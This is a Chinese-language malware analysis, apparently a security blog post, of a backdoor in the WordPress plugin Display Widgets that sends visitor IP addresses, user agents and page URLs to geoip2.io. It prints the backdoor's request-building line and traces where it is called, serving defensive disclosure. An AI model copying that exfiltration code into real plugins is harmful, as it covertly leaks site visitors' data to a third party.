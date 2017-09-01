Display Widgets是WordPress一款插件，大约有200,000站点在使用该插件。最近，Display Widgets被发现存在有后门代码。该后门用于上传数据到第三方服务器，上传的数据包括用户IP地址，UA标识等。本文是对此后门的技术分析。

预警通告链接：http://blog.nsfocus.net/wordpress-display-widgets-backdoor/

后门分析

Display Widgets安装后如下图

在没有安装Display Widgets插件，Widgets原来的样子

Display Widgets插件开启后的样子

Display Widgets插件扩展了小工具的功能.

虽然这个插件是在后台进行操作配置的，但是我们在浏览wordpress前端网页时，这个插件仍然可被加载.

我们访问一下wordpress文章页面，并在后门处下断

在后门文件上下断点，访问前端文章页面，被断下，证明此时后门已经加载了。

下面我们分析下这个后门。

这个后门文件名为geolocation.php，在插件安装后位于wp-content/plugins/display-widgets/文件夹中

发现代码中有多处wp_remote_get()方法：

这个方法是用来向外发送get请求的，如下图所示：

而且插件代码调用这个方法向外发送一个可疑的request_url参数，

$request_url = ‘http://geoip2.io/api/update/?url=’ . urlencode( self::get_protocol() . $_SERVER[ ‘HTTP_HOST’ ] . $_SERVER[ ‘REQUEST_URI’ ] ) . ‘&agent=’ . urlencode( self::get_user_agent() ) . ‘&geo=true&p=9&v=0&ip=’ . urlencode( $_SERVER[ ‘REMOTE_ADDR’ ] ) . ‘&siteurl=’ . urlencode( get_site_url() );

因此这处怀疑是一处后门。

我们分析下这个request_url参数都向外发送了什么，下面具体分析下：

request_url这个参数拼接了一个地址，并向这个地址通过get主要提交了url参数、agent参数和siteurl参数。

我们看一下这三个参数中泄露了什么信息

先看url参数中：

参数中的第一处调用了get_protocol()方法，，我们看下get_protocol方法，如下所示：

这个方法是用来判断网址是否是https的

然后紧接着拼接了一个$_SERVER[ ‘HTTP_HOST’ ] 和$_SERVER[ ‘REQUEST_URI’ ]组成了url参数

再看agent参数中：

包含了user_agent和$_SERVER[ ‘REMOTE_ADDR’ ]

get_user_agent方法如下所示，这个方法返回了$_SERVER[ ‘HTTP_USER_AGENT’ ] 的值

最后看siteurl参数中：

包含了网站的地址。

这些信息最终通过wp_remote_get方法被发送给了http://geoip2.io这个站，如下图所示

那代码中一共有多少处发送请求的地方呢？

一共用三处，这三处发送的内容一样，就是上文所分析的内容。

首先第一处在get_country方法

这个方法在display-widgets.php（插件主文件）中show_geolocation方法中被使用

第二处、第三次都在在check_query_string方法中，如下代码：

check_query_string方法在wp动作执行时被触发时被调用，如下图

而Wp动作意思是在wp项目被启动

另外，这个文件中还有个get_remote_ip方法，但是这个并没有被调用，

虽然没有被调用，但仍然可以看出这个方法是返回$_SERVER[ ‘REMOTE_ADDR’ ]值用的，如下图，因为是本地测试，值是127.0.0.1

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